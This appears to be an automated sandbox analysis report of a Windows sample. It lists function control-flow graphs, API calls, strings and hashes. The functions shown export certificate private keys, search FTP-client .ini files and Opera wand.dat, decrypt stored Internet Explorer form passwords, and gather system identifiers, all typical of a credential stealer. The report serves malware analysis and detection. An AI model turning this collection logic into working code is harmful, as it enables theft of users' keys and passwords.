                                        • Opcode ID: 48701fc6f7a53f3fc018017c5ffdf1ba83a84274159a28ee573b11ab335abaaf
                                        • Instruction ID: 3548df5e5d92ba112170233687271ddab6d06c2e7c627c520b4db7f76654d2b1
                                        • Opcode Fuzzy Hash: 48701fc6f7a53f3fc018017c5ffdf1ba83a84274159a28ee573b11ab335abaaf
                                        • Instruction Fuzzy Hash: C871883181011DAADF226F51CC02BDD7AB6BF44704F14C4BAB598740B1DE7A5AA1EF88

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 170 40d67c-40d69a call 40162c 173 40d6a0-40d6a7 170->173 174 40d86d-40d87b call 401672 170->174 173->174 175 40d6ad-40d6b4 173->175 175->174 177 40d6ba-40d6c1 175->177 177->174 179 40d6c7-40d6ce 177->179 179->174 180 40d6d4-40d6db 179->180 180->174 181 40d6e1-40d6e8 180->181 181->174 182 40d6ee-40d6f5 181->182 182->174 183 40d6fb-40d70f CertOpenSystemStoreA 182->183 183->174 184 40d715 183->184 185 40d717-40d725 CertEnumCertificatesInStore 184->185 186 40d727-40d867 CertCloseStore 185->186 187 40d72c-40d73a 185->187 186->174 189 40d740 187->189 190 40d85d 187->190 191 40d853-40d857 189->191 190->185 191->190 192 40d745-40d753 lstrcmpA 191->192 193 40d759-40d75d 192->193 194 40d84d-40d850 192->194 193->194 195 40d763-40d78b call 40190b call 401942 lstrcmpA 193->195 194->191 200 40d791-40d7a8 CryptAcquireCertificatePrivateKey 195->200 201 40d845-40d848 call 4018f4 195->201 200->201 202 40d7ae-40d7c0 CryptGetUserKey 200->202 201->194 204 40d7c2-40d7d9 CryptExportKey 202->204 205 40d83a-40d83f CryptReleaseContext 202->205 206 40d831-40d834 CryptDestroyKey 204->206 207 40d7db-40d7fe call 40190b CryptExportKey 204->207 205->201 206->205 210 40d800-40d824 call 4015a5 call 4015db * 2 207->210 211 40d829-40d82c call 4018f4 207->211 210->211 211->206
                                        APIs
                                        • CertOpenSystemStoreA.CRYPT32(00000000,00416216), ref: 0040D702
                                        • CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D71B
                                        • lstrcmpA.KERNEL32(?,2.5.29.37), ref: 0040D74C
                                          • Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919
                                        • lstrcmpA.KERNEL32(?,00416223,00000000,?,00000000,00000000,?,2.5.29.37), ref: 0040D784
                                        • CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D7A0
                                        • CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D7B8
                                        • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D7D1
                                        • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D7F6
                                        • CryptDestroyKey.ADVAPI32(?), ref: 0040D834
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D83F
                                        • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D867
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
                                        • String ID: 2.5.29.37
                                        • API String ID: 2649496969-3842544949
                                        • Opcode ID: e5cc720597dd0b0bfed270f8281436db206444160b3c3517c161f6a20745e8b7
                                        • Instruction ID: d2a6f2ac97224c0d901a019ef032b959bd315932c7f56dbf06825e9e5b2bb0c7
                                        • Opcode Fuzzy Hash: e5cc720597dd0b0bfed270f8281436db206444160b3c3517c161f6a20745e8b7
                                        • Instruction Fuzzy Hash: 7E511732D00205EBDF22ABA1DC0AFEEBB71EB44705F148436E221B51F0D7795994DB58

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 269 405108-405120 270 405122-405125 269->270 271 405127 269->271 270->271 273 40512c-405136 call 4025f6 270->273 272 405285-405291 call 4018f4 271->272 278 405147-40514f call 401e34 273->278 279 405138-405145 call 401e34 273->279 283 405154-405184 call 401922 FindFirstFileA 278->283 279->283 283->272 286 40518a-405196 283->286 287 405198-4051a8 lstrcmpiA 286->287 288 4051fd-405218 StrStrIA 286->288 291 4051aa 287->291 292 4051af-4051c5 lstrcmpiA 287->292 289 405260-405274 FindNextFileA 288->289 290 40521a-405239 call 401e34 call 401e88 288->290 289->286 293 40527a-405280 FindClose 289->293 304 405248 290->304 305 40523b-405246 StrStrIA 290->305 291->289 295 4051c7 292->295 296 4051cc-4051fb call 401e34 call 401e88 call 405108 call 4018f4 292->296 293->272 295->289 296->289 306 40524d-405250 304->306 305->306 308 405252-405256 call 4050f1 306->308 309 40525b call 4018f4 306->309 308->309 309->289
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00405178
                                        • lstrcmpiA.KERNEL32(00414900,?), ref: 004051A1
                                        • lstrcmpiA.KERNEL32(00414902,?), ref: 004051BE
                                        • FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 0040526D
                                        • FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 00405280
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
                                          • Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
                                          • Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                        • String ID: *.*$.ini$Sites\$\*.*
                                        • API String ID: 3040542784-999409347
                                        • Opcode ID: d4198b782cc50647568fc352e49b3827d11038156717d300b2a354d5adf5e24d
                                        • Instruction ID: 92fea1592d8d9cebbb1ab59b3cffad2d04c4a45fac070dd432891a232b779cce
                                        • Opcode Fuzzy Hash: d4198b782cc50647568fc352e49b3827d11038156717d300b2a354d5adf5e24d
                                        • Instruction Fuzzy Hash: A2314FB1900609AADF11AB61CC06BEF7768EF50308F1481BBB91CB91E1D77D8ED19E58

                                        Control-flow Graph

                                        APIs
                                        • GetVersionExA.KERNEL32(0000009C), ref: 004048C6
                                        • GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 0040494B
                                        • GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404974
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404A29
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404A48
                                        • GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404A58
                                        • GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404A66
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
                                        • String ID: GetNativeSystemInfo$HWID$kernel32.dll
                                        • API String ID: 1787888500-92997708
                                        • Opcode ID: 6fbdeea1c4f244062ac394409f982e4d2bc40400ca5b27b4f38d13cd6d30d012
                                        • Instruction ID: 7dbe06de0323f137e8a3642c202c803697ee0d295fd11c1b643691ea5f2f9791
                                        • Opcode Fuzzy Hash: 6fbdeea1c4f244062ac394409f982e4d2bc40400ca5b27b4f38d13cd6d30d012
                                        • Instruction Fuzzy Hash: 205144B1A40218BEDF217B61CC02F9D7A35AF81344F1480BBB649790E1DBB95BD09F59
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00408E02
                                        • lstrcmpiA.KERNEL32(00414900,?), ref: 00408E35
                                        • lstrcmpiA.KERNEL32(00414902,?), ref: 00408E4F
                                        • StrStrIA.SHLWAPI(?,opera,00000000,00414902,?,00414900,?,00000000,?), ref: 00408E94
                                        • FindNextFileA.KERNEL32(?,?,00000000,?), ref: 00408EC2
                                        • FindClose.KERNEL32(?,?,?,00000000,?), ref: 00408ED5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Filelstrcmpi$CloseFirstNext
                                        • String ID: \*.*$opera$wand.dat
                                        • API String ID: 3663067366-3278183560
                                        • Opcode ID: cc25a33227bf8eb1f895c57babc8f57bd3b6ac3bcb532f689d68813b1a9d7db5
                                        • Instruction ID: 0b5b682e81162d08b085a00fa4b4687e521e2ccc034a3606a931e69e32089006
                                        • Opcode Fuzzy Hash: cc25a33227bf8eb1f895c57babc8f57bd3b6ac3bcb532f689d68813b1a9d7db5
                                        • Instruction Fuzzy Hash: D1314F71900219AADF61AB61CD02BEEB775AF54308F0440FBE54CB51E1DA788ED48F98
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00404496
                                        • lstrcmpiA.KERNEL32(00414900,?), ref: 004044C3
                                        • lstrcmpiA.KERNEL32(00414902,?), ref: 004044E0
                                        • FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 004045AA
                                        • FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 004045BD
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
                                          • Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
                                          • Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                        • String ID: *.*$\*.*
                                        • API String ID: 3040542784-1692270452
                                        • Opcode ID: e9ae95528873cf45815014cbf6bce20d71f811a676aa9b2c76d68bbdc6b83fe1
                                        • Instruction ID: 2b8e11bb01219329c343f90d65f401ade9b947c1a14df818a3a3490a176c20b7
                                        • Opcode Fuzzy Hash: e9ae95528873cf45815014cbf6bce20d71f811a676aa9b2c76d68bbdc6b83fe1
                                        • Instruction Fuzzy Hash: 70413EB1500209BBDF11AF61CC06BEE7769AF94308F1040B7BB18750F1D7798E919B59
                                        APIs
                                        • lstrlenW.KERNEL32(?), ref: 0040A9E0
                                        • wsprintfA.USER32 ref: 0040AA5D
                                        • lstrlenW.KERNEL32(?,?), ref: 0040AAA3
                                        • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040AAE6
                                        • LocalFree.KERNEL32(00000000), ref: 0040AB1D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
                                        • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                        • API String ID: 1926481713-2450551051
                                        • Opcode ID: ce5d445aa7dbbad832ed7abe80867de63fb84df2ba09d9b6e92dc2e79bfe537e
                                        • Instruction ID: a333c54da175db08d4beb54a880d019b2099c34658143f28011c69dd7b0ab911
                                        • Opcode Fuzzy Hash: ce5d445aa7dbbad832ed7abe80867de63fb84df2ba09d9b6e92dc2e79bfe537e
                                        • Instruction Fuzzy Hash: FF412B72C10218EADF119FA0DC05FEEBB79EF08314F14403AFA10B51A1E7799A61DB59
                                        APIs
                                          • Part of subcall function 004F065F: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,004F00F0), ref: 004F066C
                                          • Part of subcall function 004F065F: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000104), ref: 004F0696
                                        • SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 004F00FA
                                        • ReadFile.KERNEL32(00000000,?,?,?,?,00000000), ref: 004F010B
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 004F0110
                                        • VirtualProtect.KERNEL32(?,?,00000004,?,?), ref: 004F0145
                                        • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00000004,?,?), ref: 004F0155
                                        • VirtualProtect.KERNEL32(?,?,00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004), ref: 004F01A5
                                        • VirtualProtect.KERNEL32(00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004,?,?), ref: 004F01B3
                                        • VirtualFree.KERNELBASE(?,00004000,00000002,?,?,?,00000004,?,?), ref: 004F0216
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904362145.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4f0000_pbfe2Xcxue.jbxd
                                        Similarity
                                        • API ID: Virtual$Protect$File$AllocCloseCreateFreeHandlePointerRead
                                        • String ID:
                                        • API String ID: 2395391813-0
                                        • Opcode ID: ea589b0b73983e460bf43557bd5fc03f11857d5ef57e9652a38160b8af110ef1
                                        • Instruction ID: 00ddb1a515aae8e4eb995398f131cdc585d9fd7ef00bcc0d4f63a9a6b17590b2
                                        • Opcode Fuzzy Hash: ea589b0b73983e460bf43557bd5fc03f11857d5ef57e9652a38160b8af110ef1
                                        • Instruction Fuzzy Hash: D4419072200208AFDB109F65CC45E7A77A9FF84724F25444EFA058B253C775EC51CBA5
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 004054E7
                                        • lstrcmpiA.KERNEL32(00414900,?), ref: 00405516
                                        • lstrcmpiA.KERNEL32(00414902,?), ref: 00405530
                                        • FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 00405588
                                        • FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 0040559B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Filelstrcmpi$CloseFirstNext
                                        • String ID: \*.*
                                        • API String ID: 3663067366-1173974218
                                        • Opcode ID: ef0fbe648dd5950b6d42cea9b3198d230830f9ad383abd24334b68506a52d383
                                        • Instruction ID: 7e0189514424c7944c273d5ce23bde88461ff61316db25badbfa8ed08f785570
                                        • Opcode Fuzzy Hash: ef0fbe648dd5950b6d42cea9b3198d230830f9ad383abd24334b68506a52d383
                                        • Instruction Fuzzy Hash: 0E311A7181061DAADF21AB61CC06BEF7769EF14308F4040BAB90CA50F1E6788ED09F58
                                        APIs
                                        • CoCreateInstance.OLE32(00415C64,00000000,00000005,00415C74,?), ref: 0040AB4F
                                        • StrStrIW.SHLWAPI(00000000,00415C94), ref: 0040ABC6
                                        • CoTaskMemFree.OLE32(00000000,00000000,00415C94), ref: 0040ABF1
                                        • CoTaskMemFree.OLE32(00000000,00000000,00000000,00415C94), ref: 0040ABFF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeTask$CreateInstance
                                        • String ID: ($http://www.facebook.com/
                                        • API String ID: 2903366249-3677894361
                                        • Opcode ID: 3a66d303758c1357d4830ebb98179536296482120f459dea4ead343d77e1b8d3
                                        • Instruction ID: 1fa63d5eefd38a050360b30d01d12268977e5298d26fee42fb9246681ffbe078
                                        • Opcode Fuzzy Hash: 3a66d303758c1357d4830ebb98179536296482120f459dea4ead343d77e1b8d3
                                        • Instruction Fuzzy Hash: DB31FB70A04209EBEF11DF90CD89BCEFB75BF44308F248166E5007A291D3799AD5DB99
                                        APIs
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004029F0
                                        • GetCurrentProcess.KERNEL32 ref: 004029FA
                                        • OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 00402A08
                                        • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 00402A4A
                                        • CloseHandle.KERNEL32(00000000), ref: 00402A5E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                        • String ID:
                                        • API String ID: 3038321057-0
                                        • Opcode ID: 3f05c3982a650b37c23475f6534c76ec1c630d9722eaeb3c0dcb334f148eab72
                                        • Instruction ID: 5b4abacae6c47807b72f7d9eb44744d900e200b0848b9b25bea25bf6b731d153
                                        • Opcode Fuzzy Hash: 3f05c3982a650b37c23475f6534c76ec1c630d9722eaeb3c0dcb334f148eab72
                                        • Instruction Fuzzy Hash: 22114C72A00209EBEF218F94DD4EBEEBBB5AB00708F108136A211B51D0D7F88685DF58
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 00410881
                                        • GetUserNameA.ADVAPI32(?,00000101), ref: 004108D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InitializeNameUser
                                        • String ID: cryptimplus
                                        • API String ID: 2272643758-1201002197
                                        • Opcode ID: 7aad9943768656681877972dfde67bb428f4de76b68b4e3eee124481e3a883d4
                                        • Instruction ID: 846a3aad92cbda43a519cda982567d365da2cf2d7accc983c7590fc84842bfdd
                                        • Opcode Fuzzy Hash: 7aad9943768656681877972dfde67bb428f4de76b68b4e3eee124481e3a883d4
                                        • Instruction Fuzzy Hash: 43F0F4B1609201A9EB11BBBADE077CD39A49F1034CF04807BB115B91E2DAFD49C4D6AE
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(0041090A), ref: 0041094E
                                        • RevertToSelf.ADVAPI32(?,?,0041090A), ref: 00410991
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterRevertSelfUnhandled
                                        • String ID: diamond
                                        • API String ID: 669012916-1381693260
                                        • Opcode ID: f50e416bd8ac59a79b7d46a167da7fee66e9d189a954c2d91d15bcb3ce08b3f7
                                        • Instruction ID: 2a6c495f0e8fcbc1f67cd432cca76d066b336a6ef08125a445b8c24b712f0a6e
                                        • Opcode Fuzzy Hash: f50e416bd8ac59a79b7d46a167da7fee66e9d189a954c2d91d15bcb3ce08b3f7
                                        • Instruction Fuzzy Hash: 0EE0EDB4540205EADB10BBE2E91B7CD3565AF4434CF11402FB51452197CFFC46C8DA6E
                                        APIs
                                        • LoadLibraryA.KERNEL32(?), ref: 0040251D
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040254B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID:
                                        • API String ID: 2574300362-0
                                        • Opcode ID: a438bec78348ac7d54587d823988aef6f565806871fb1a07440a70bde571dc48
                                        • Instruction ID: 8c0463c41eb16a985e8fb0086ea0cfaf484124ef3f908e04b586e83b7918065b
                                        • Opcode Fuzzy Hash: a438bec78348ac7d54587d823988aef6f565806871fb1a07440a70bde571dc48
                                        • Instruction Fuzzy Hash: EBF0B4733041152AD7106939AC4999B6B88EBE33B8B105137F806B72C1E1BDDD86C3A8
                                        APIs
                                          • Part of subcall function 004030D3: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403118
                                        • recv.WSOCK32(?,?,00000001,00000000), ref: 00403165
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: recvselect
                                        • String ID:
                                        • API String ID: 741273618-0
                                        • Opcode ID: 56b9539280dcd20de9aaf7895cab5ce372aa8c3703bcaa6a2f5f57fdf9e3e94a
                                        • Instruction ID: d001e1d827fc67b6fe399618d60d058818c6c1ba743e6e7188f86895497b48fe
                                        • Opcode Fuzzy Hash: 56b9539280dcd20de9aaf7895cab5ce372aa8c3703bcaa6a2f5f57fdf9e3e94a
                                        • Instruction Fuzzy Hash: BF01BC31340209BBDB109E51CC82B9E3B69AB1830AF108133B901BD2D5D3B9EB458759
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: }H@
                                        • API String ID: 0-3977553548
                                        • Opcode ID: c68f41f81983429f5a8ad830fc9e8a2afb7ea63f1d17de5f8559a072b33e4072
                                        • Instruction ID: 29df09d85e5e9c85869cd1640486071c566c2a58f5f72f8cacd3f28cd64a90cc
                                        • Opcode Fuzzy Hash: c68f41f81983429f5a8ad830fc9e8a2afb7ea63f1d17de5f8559a072b33e4072
                                        • Instruction Fuzzy Hash: 0C11EF71604188EFDB329B14CC02B9A7FB5EB41704F158033E803A5DE2C73D8956D609

                                        Control-flow Graph

                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00405D02
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405D32
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405D80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
